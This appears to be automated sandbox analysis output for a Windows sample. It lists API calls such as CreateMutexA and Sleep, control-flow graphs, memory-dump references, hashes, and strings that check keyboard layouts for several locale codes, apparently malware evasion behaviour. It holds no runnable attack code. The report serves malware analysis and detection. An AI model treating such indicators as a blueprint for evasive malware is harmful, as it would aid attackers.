                                                                                                                                              Total number of Nodes:754
                                                                                                                                              Total number of Limit Nodes:16
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(?,?,00E8652A,?,?,?,?,?,00E87661), ref: 00E86567
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 41caee13a4d2d3e8f75839153a2a1430ea25f22622371c62ca5326486f7ce0bb
                                                                                                                                              • Instruction ID: e66f22f21a431be429ffe4bc4629c7ae4165cd71c09e21fed11cb16840968ab4
                                                                                                                                              • Opcode Fuzzy Hash: 41caee13a4d2d3e8f75839153a2a1430ea25f22622371c62ca5326486f7ce0bb
                                                                                                                                              • Instruction Fuzzy Hash: 0EE08C30140108AFDF36BB58D92DE8C3BA9EB61749F843C20F81CA6226CB25DE81C780
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: D'{s
                                                                                                                                              • API String ID: 0-234340520
                                                                                                                                              • Opcode ID: 67eaa37b7f9cd023c8cc34291a420d5b4432cedb5e5242f80b596a7c10602071
                                                                                                                                              • Instruction ID: b77fabf371b6045500efc031ab0272a11b58fbe4fef47e4a79ccd445e1e55010
                                                                                                                                              • Opcode Fuzzy Hash: 67eaa37b7f9cd023c8cc34291a420d5b4432cedb5e5242f80b596a7c10602071
                                                                                                                                              • Instruction Fuzzy Hash: E101D4AB04C224BE2153D8827B3C9BF3B6FE5D7330B30902ABC4797642F1954A59A172

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                              • API String ID: 0-3963862150
                                                                                                                                              • Opcode ID: d280e3453d99cf95f4f8820342990e4c7575e8d0c6d4bcd2815a385699aedd40
                                                                                                                                              • Instruction ID: ce77ef4464c31eed73796a7f998adae3398422e7937928acafd2d0461bf60149
                                                                                                                                              • Opcode Fuzzy Hash: d280e3453d99cf95f4f8820342990e4c7575e8d0c6d4bcd2815a385699aedd40
                                                                                                                                              • Instruction Fuzzy Hash: 01F1E471A002489BEB24DF54CC85BDEBBB9EF45304F5046A8F918B72C1DB749A88CF95

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 92 e59ba5-e59d91 call e67a00 call e55c10 call e58b30 call e68220
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 94d1fa15a107f5205993f3751fe0cc4e821ba7239ea618113e88f6a9d80ce62a
                                                                                                                                              • Instruction ID: 3f5f2572e82717c837c399203e3867d267e770c20b193963cd96a7ccd6181f6a
                                                                                                                                              • Opcode Fuzzy Hash: 94d1fa15a107f5205993f3751fe0cc4e821ba7239ea618113e88f6a9d80ce62a
                                                                                                                                              • Instruction Fuzzy Hash: 67312871604200CBFB08DB78EC8979DFBA2EBC1315F286B18E814B73D6C77559898752

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 114 e59f44-e59f64 118 e59f66-e59f72 114->118 119 e59f92-e59fae 114->119 120 e59f74-e59f82 118->120 121 e59f88-e59f8f call e6d663 118->121 122 e59fb0-e59fbc 119->122 123 e59fdc-e59ffb 119->123 120->121 128 e5a92b 120->128 121->119 124 e59fd2-e59fd9 call e6d663 122->124 125 e59fbe-e59fcc 122->125 126 e59ffd-e5a009 123->126 127 e5a029-e5a916 call e680c0 123->127 124->123 125->124 125->128 131 e5a01f-e5a026 call e6d663 126->131 132 e5a00b-e5a019 126->132 134 e5a953-e5a994 Sleep CreateMutexA 128->134 135 e5a92b call e86c6a 128->135 131->127 132->128 132->131 144 e5a9a7-e5a9a8 134->144 145 e5a996-e5a998 134->145 135->134 145->144 146 e5a99a-e5a9a5 145->146 146->144
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 4801a237da14c6d6ad2ccfe79191457fbb1e30cbcb217747def8aabc7aef1f48
                                                                                                                                              • Instruction ID: 8b976564e62cc5c152848e7877594705390d865a791110e28f6b4f1c20faa003
                                                                                                                                              • Opcode Fuzzy Hash: 4801a237da14c6d6ad2ccfe79191457fbb1e30cbcb217747def8aabc7aef1f48
                                                                                                                                              • Instruction Fuzzy Hash: C23128717042008BEB18DB78EC857ADB7A2EFC5315F286B28E814F73D5C73559888762

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 148 e5a079-e5a099 152 e5a0c7-e5a0e3 148->152 153 e5a09b-e5a0a7 148->153 156 e5a0e5-e5a0f1 152->156 157 e5a111-e5a130 152->157 154 e5a0bd-e5a0c4 call e6d663 153->154 155 e5a0a9-e5a0b7 153->155 154->152 155->154 158 e5a930-e5a994 call e86c6a Sleep CreateMutexA 155->158 160 e5a107-e5a10e call e6d663 156->160 161 e5a0f3-e5a101 156->161 162 e5a132-e5a13e 157->162 163 e5a15e-e5a916 call e680c0 157->163 178 e5a9a7-e5a9a8 158->178 179 e5a996-e5a998 158->179 160->157 161->158 161->160 168 e5a154-e5a15b call e6d663 162->168 169 e5a140-e5a14e 162->169 168->163 169->158 169->168 179->178 180 e5a99a-e5a9a5 179->180 180->178
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 4614ac339283491712165196619cdcebde8779b9f630aa36141775ce75d62c86
                                                                                                                                              • Instruction ID: a8067c19a12af9e309ced0e65139a79b78690363d10427b779a13078af170b99
                                                                                                                                              • Opcode Fuzzy Hash: 4614ac339283491712165196619cdcebde8779b9f630aa36141775ce75d62c86
                                                                                                                                              • Instruction Fuzzy Hash: 393168717101008BEB08DB78ED8976DB7A2DBC1315F286B28E814B73D5C73559888713

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 182 e5a1ae-e5a1ce 186 e5a1d0-e5a1dc 182->186 187 e5a1fc-e5a218 182->187 188 e5a1f2-e5a1f9 call e6d663 186->188 189 e5a1de-e5a1ec 186->189 190 e5a246-e5a265 187->190 191 e5a21a-e5a226 187->191 188->187 189->188 194 e5a935 189->194 192 e5a267-e5a273 190->192 193 e5a293-e5a916 call e680c0 190->193 196 e5a23c-e5a243 call e6d663 191->196 197 e5a228-e5a236 191->197 199 e5a275-e5a283 192->199 200 e5a289-e5a290 call e6d663 192->200 203 e5a953-e5a994 Sleep CreateMutexA 194->203 204 e5a935 call e86c6a 194->204 196->190 197->194 197->196 199->194 199->200 200->193 212 e5a9a7-e5a9a8 203->212 213 e5a996-e5a998 203->213 204->203 213->212 214 e5a99a-e5a9a5 213->214 214->212
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 4fb361f1cd55174e3823ad01a7c0848d290abb8be3e907288eab317684ac6595
                                                                                                                                              • Instruction ID: e069ab6a8075e62da7ebc300ae0d36ff3897eb32373c1916868b3796c4f247b6
                                                                                                                                              • Opcode Fuzzy Hash: 4fb361f1cd55174e3823ad01a7c0848d290abb8be3e907288eab317684ac6595
                                                                                                                                              • Instruction Fuzzy Hash: 3D315771A001008FEB08DB78ED8A75DB762EBC6315F286B28E804B73D4C73559888312

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 216 e5a418-e5a438 220 e5a466-e5a482 216->220 221 e5a43a-e5a446 216->221 224 e5a484-e5a490 220->224 225 e5a4b0-e5a4cf 220->225 222 e5a45c-e5a463 call e6d663 221->222 223 e5a448-e5a456 221->223 222->220 223->222 228 e5a93f-e5a949 call e86c6a * 2 223->228 230 e5a4a6-e5a4ad call e6d663 224->230 231 e5a492-e5a4a0 224->231 226 e5a4d1-e5a4dd 225->226 227 e5a4fd-e5a916 call e680c0 225->227 233 e5a4f3-e5a4fa call e6d663 226->233 234 e5a4df-e5a4ed 226->234 247 e5a94e 228->247 248 e5a949 call e86c6a 228->248 230->225 231->228 231->230 233->227 234->228 234->233 249 e5a953-e5a994 Sleep CreateMutexA 247->249 250 e5a94e call e86c6a 247->250 248->247 252 e5a9a7-e5a9a8 249->252 253 e5a996-e5a998 249->253 250->249 253->252 254 e5a99a-e5a9a5 253->254 254->252
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: d72e7d4669c932116e36e8df4a5c6fe63597112f611774023df309ff4e7f3d6b
                                                                                                                                              • Instruction ID: 79a3e5cf10d7892a7a8ca6a6bf5403e7065ce29058dc303ba816e26aefefe73d
                                                                                                                                              • Opcode Fuzzy Hash: d72e7d4669c932116e36e8df4a5c6fe63597112f611774023df309ff4e7f3d6b
                                                                                                                                              • Instruction Fuzzy Hash: AD313C716041009BEB089BB8EC8976DF7A2DFC1315F286B28E414B73D5D77559848752

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 256 e5a54d-e5a56d 260 e5a56f-e5a57b 256->260 261 e5a59b-e5a5b7 256->261 262 e5a591-e5a598 call e6d663 260->262 263 e5a57d-e5a58b 260->263 264 e5a5e5-e5a604 261->264 265 e5a5b9-e5a5c5 261->265 262->261 263->262 268 e5a944-e5a949 call e86c6a 263->268 266 e5a606-e5a612 264->266 267 e5a632-e5a916 call e680c0 264->267 270 e5a5c7-e5a5d5 265->270 271 e5a5db-e5a5e2 call e6d663 265->271 272 e5a614-e5a622 266->272 273 e5a628-e5a62f call e6d663 266->273 284 e5a94e 268->284 285 e5a949 call e86c6a 268->285 270->268 270->271 271->264 272->268 272->273 273->267 286 e5a953-e5a994 Sleep CreateMutexA 284->286 287 e5a94e call e86c6a 284->287 285->284 290 e5a9a7-e5a9a8 286->290 291 e5a996-e5a998 286->291 287->286 291->290 292 e5a99a-e5a9a5 291->292 292->290
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: a25fe7cbcd9ce83776c21da27ad69253a6335242507c784ad92b8343beebe592
                                                                                                                                              • Instruction ID: 126b29a229ffa51d2d9e5a877cad05ba9878a5d9bb7893bee8af0419560777fc
                                                                                                                                              • Opcode Fuzzy Hash: a25fe7cbcd9ce83776c21da27ad69253a6335242507c784ad92b8343beebe592
                                                                                                                                              • Instruction Fuzzy Hash: 32314C716041008FEB08DB78EC85B6DB7A2EBC5319F286B28E814B73D5DB7599848712

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 294 e5a682-e5a6a2 298 e5a6a4-e5a6b0 294->298 299 e5a6d0-e5a6ec 294->299 302 e5a6c6-e5a6cd call e6d663 298->302 303 e5a6b2-e5a6c0 298->303 300 e5a6ee-e5a6fa 299->300 301 e5a71a-e5a739 299->301 304 e5a710-e5a717 call e6d663 300->304 305 e5a6fc-e5a70a 300->305 306 e5a767-e5a916 call e680c0 301->306 307 e5a73b-e5a747 301->307 302->299 303->302 308 e5a949 303->308 304->301 305->304 305->308 312 e5a75d-e5a764 call e6d663 307->312 313 e5a749-e5a757 307->313 315 e5a94e 308->315 316 e5a949 call e86c6a 308->316 312->306 313->308 313->312 317 e5a953-e5a994 Sleep CreateMutexA 315->317 318 e5a94e call e86c6a 315->318 316->315 326 e5a9a7-e5a9a8 317->326 327 e5a996-e5a998 317->327 318->317 327->326 328 e5a99a-e5a9a5 327->328 328->326
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 51e03fce919f5af7ddb0eabbf8999f46c8acc84182b8a115accdcfc60eae72f2
                                                                                                                                              • Instruction ID: 3b865052fbf3cbfeb23b1f1f39a252d9649dcdb55353305e6989026414d095d7
                                                                                                                                              • Opcode Fuzzy Hash: 51e03fce919f5af7ddb0eabbf8999f46c8acc84182b8a115accdcfc60eae72f2
                                                                                                                                              • Instruction Fuzzy Hash: CC3148716042408FEB08DB78EC8976DB7A2EBC5315F2CAB28E814B73D5C77559888753

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 330 e59adc-e59ae8 331 e59afe-e59d91 call e6d663 call e67a00 call e55c10 call e58b30 call e68220 call e67a00 call e55c10 call e58b30 call e68220 330->331 332 e59aea-e59af8 330->332 332->331 333 e5a917 332->333 335 e5a953-e5a994 Sleep CreateMutexA 333->335 336 e5a917 call e86c6a 333->336 341 e5a9a7-e5a9a8 335->341 342 e5a996-e5a998 335->342 336->335 342->341 345 e5a99a-e5a9a5 342->345 345->341
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 49a008ca88478b4adc015cdf1fa32aa45c587000bec43ca81404337903e542f5
                                                                                                                                              • Instruction ID: 3a3f8e2580b4a3485c18d09fb294d09f1cc28bfd47f184d2aba57561d7d48519
                                                                                                                                              • Opcode Fuzzy Hash: 49a008ca88478b4adc015cdf1fa32aa45c587000bec43ca81404337903e542f5
                                                                                                                                              • Instruction Fuzzy Hash: 9C2167317442009BFB189B68FC8676DF7A2EBC1315F286B28E808F72D5DB7559888612

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 398 e5a856-e5a86e 399 e5a870-e5a87c 398->399 400 e5a89c-e5a89e 398->400 401 e5a892-e5a899 call e6d663 399->401 402 e5a87e-e5a88c 399->402 403 e5a8a0-e5a8a7 400->403 404 e5a8a9-e5a8b1 call e57d30 400->404 401->400 402->401 406 e5a94e 402->406 408 e5a8eb-e5a916 call e680c0 403->408 414 e5a8e4-e5a8e6 404->414 415 e5a8b3-e5a8bb call e57d30 404->415 410 e5a953-e5a987 Sleep CreateMutexA 406->410 411 e5a94e call e86c6a 406->411 418 e5a98e-e5a994 410->418 411->410 414->408 415->414 422 e5a8bd-e5a8c5 call e57d30 415->422 420 e5a9a7-e5a9a8 418->420 421 e5a996-e5a998 418->421 421->420 423 e5a99a-e5a9a5 421->423 422->414 427 e5a8c7-e5a8cf call e57d30 422->427 423->420 427->414 430 e5a8d1-e5a8d9 call e57d30 427->430 430->414 433 e5a8db-e5a8e2 430->433 433->408
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 39f814376c3f7e4db96592de50d1a5200e20999d651161a71c9830252528135e
                                                                                                                                              • Instruction ID: 1385aba8a81c551276375c2a878be293a1f6eaf2e26ce11dd4ed911c2436525b
                                                                                                                                              • Opcode Fuzzy Hash: 39f814376c3f7e4db96592de50d1a5200e20999d651161a71c9830252528135e
                                                                                                                                              • Instruction Fuzzy Hash: AC213B702442008EFB286778EC5A72DF7929B81306F2C3E25ED44B63D1CA7654494253

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 375 e5a34f-e5a35b 376 e5a371-e5a39a call e6d663 375->376 377 e5a35d-e5a36b 375->377 383 e5a39c-e5a3a8 376->383 384 e5a3c8-e5a916 call e680c0 376->384 377->376 378 e5a93a 377->378 380 e5a953-e5a994 Sleep CreateMutexA 378->380 381 e5a93a call e86c6a 378->381 391 e5a9a7-e5a9a8 380->391 392 e5a996-e5a998 380->392 381->380 387 e5a3be-e5a3c5 call e6d663 383->387 388 e5a3aa-e5a3b8 383->388 387->384 388->378 388->387 392->391 395 e5a99a-e5a9a5 392->395 395->391
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 3c2285de2ea72c554ad584e3f402577da064fe9c78761416daa4b2885d5c85c7
                                                                                                                                              • Instruction ID: 0447ec4a7a92892a8fa30ecb97a2b6b5d160bf16a7f8bc35a829715b7bdcb28e
                                                                                                                                              • Opcode Fuzzy Hash: 3c2285de2ea72c554ad584e3f402577da064fe9c78761416daa4b2885d5c85c7
                                                                                                                                              • Instruction Fuzzy Hash: 0F2128716442009BEB189B68FC8676DF7A2DBC1319F286B29E804B76D4CB7555888253

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E57ED3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoNativeSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1721193555-0
                                                                                                                                              • Opcode ID: d8874ac4936be8350cfe21478b84fb41e6ecce097792c02c680fe5597fc04902
                                                                                                                                              • Instruction ID: 003f6acebe33c572fe70483f17d2cbff9915a21520c1eeed874d14f4a3833894
